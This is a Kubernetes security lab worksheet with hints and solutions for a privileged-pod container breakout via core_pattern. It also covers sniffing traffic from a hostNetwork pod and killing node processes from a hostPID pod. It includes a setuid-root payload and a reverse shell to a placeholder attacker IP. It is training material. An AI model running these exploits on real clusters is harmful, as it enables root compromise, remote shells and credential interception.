Lab_07 - Hacking From the Inside

Lab 7: Hacking From the Inside

1. Pod Breakout

Let's try creating a pod with the "privileged" attribute on the master node.

Hint

Make Pod Privileged:

securityContext:
      privileged: true

Hint

Run Pod in specific k8s node:

  nodeSelector:
    kubernetes.io/hostname: <NODE_HOSTNAME>

Hint

Use the following kubectl command to determine the node hostnames:

kubectl get nodes --show-labels

Solution

breakout_pod.yaml:

apiVersion: v1
kind: Pod
metadata:
  name: breakout
spec:
  containers:
  - name: breakout
    image: alpine
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
    securityContext:
      privileged: true
  nodeSelector:
    kubernetes.io/hostname: <CURRENT_NODE>
  restartPolicy: Never

Note: Replace <CURRENT_NODE> with the hostname of the desired node.

Apply it using kubectl and see it it started successfully:

kubectl apply -f breakout_pod.yaml
kubectl describe pod breakout

The pod did not start successfully in the master node, how can we fix it?

Hint

https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/

Solution

Taint master node to allow running pods:

kubectl taint nodes --all node-role.kubernetes.io/control-plane-
kubectl taint nodes --all node.kubernetes.io/not-ready-

Delete and reapply the breakout pod:

kubectl delete -f breakout_pod.yaml
kubectl apply -f breakout_pod.yaml
kubectl describe pod breakout

The pod is started. Let's exec into it and break out of it to get "root" on the master node.

Hint

Solution

Start interactive alpine shell in the pod:

kubectl exec -it breakout -- /bin/ash

Use mount to determine that "/proc" is mounted as "rw" and the "upperdir" location of the overlay file system location:

mount

Write the exploit file "exploit.sh":

  • local access exploit payload:

echo -e '#!/bin/bash \n cp /bin/bash / \n chmod 6711 /bash' > exploit.sh && chmod 555 exploit.sh
  • remote reverse shell payload:

echo -e '#!/bin/bash \n bash -i >& /dev/tcp/<Attacker_IP>/4444 0>&1' > exploit.sh && chmod 555 exploit.sh && echo do not forget to start a listener

Note: Replace <Attacker_IP> with a valid IP.

Trigger exploit:

echo "| /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/<NUMBER>/fs/exploit.sh #'" > /proc/sys/kernel/core_pattern
tail -f /dev/null &
kill -SIGSEGV $(pgrep tail)

Note: Replace <NUMBER> with a valid overlay number.

2. Network Spoofing

Let's create a pod with the "hostNetwork" attribute.

Hint

Set "hostNetwork" Pod:

hostNetwork: true

Solution

network_pod.yaml:

apiVersion: v1
kind: Pod
metadata:
  name: network
spec:
  hostNetwork: true
  containers:
  - name: network
    image: ubuntu
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]

Use kubectl apply:

kubectl apply -f network_pod.yaml
kubectl describe pod network

Let's exec into the pod and install our tools to passively capture network trafic.

Hint

The ip and tcpdump tools will help!

Solution

Exec into the pod:

kubectl exec -it network -- /bin/bash

Install Tools:

apt-get update
apt-get install iproute2 tcpdump

Inspect network interfaces:

ip a

Capture network traffic on the localhost interface and write it to a file:

tcpdump -i lo -w - -U | tee capture.pcap | tcpdump -r -

Inspect traffic and grep for a specific string:

tcpdump -i ens160 -X | grep -C 2 -i secret

Execute the following curl command from the jumphost in order to see that it is captured by tcpdump:

curl <Pod_IP>:10250/secret

3. Node DoS

Let's create a "privileged" pod with the "hostPID" attribute.

Hint

Set "hostPID" Pod:

hostPID: true

Solution

dos_pod.yaml:

apiVersion: v1
kind: Pod
metadata:
  name: dos
spec:
  hostPID: true
  containers:
  - name: dos
    image: alpine
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
    securityContext:
      privileged: true
  restartPolicy: Never

Use kubectl apply:

kubectl apply -f dos_pod.yaml
kubectl describe pod dos

Let's exec into the pod and try different actions such as:

  • listing all processes

  • killing processes

Hint

The ps and kill commands will help!

Solution

Exec into the pod:

kubectl exec -it dos -- /bin/ash

List all processes on the node (all node processes and the processes of other pods on the node):

ps aux

Start a process (e.g. vi very_important_file) on the respective node in another terminal and kill it from inside the pod:

ps aux | grep vi
kill -9 $(pidof vi)

4. Automated Tools - trivy

Let's see what could be identified with a automated scanning tool like "trivy".

Hint

https://github.com/aquasecurity/trivy

Solution

Get and run trivy:

wget https://github.com/aquasecurity/trivy/releases/download/v0.48.2/trivy_0.48.2_Linux-64bit.tar.gz
tar -xzvf trivy_0.48.2_Linux-64bit.tar.gz
./trivy k8s cluster --report summary --timeout 10m

Last updated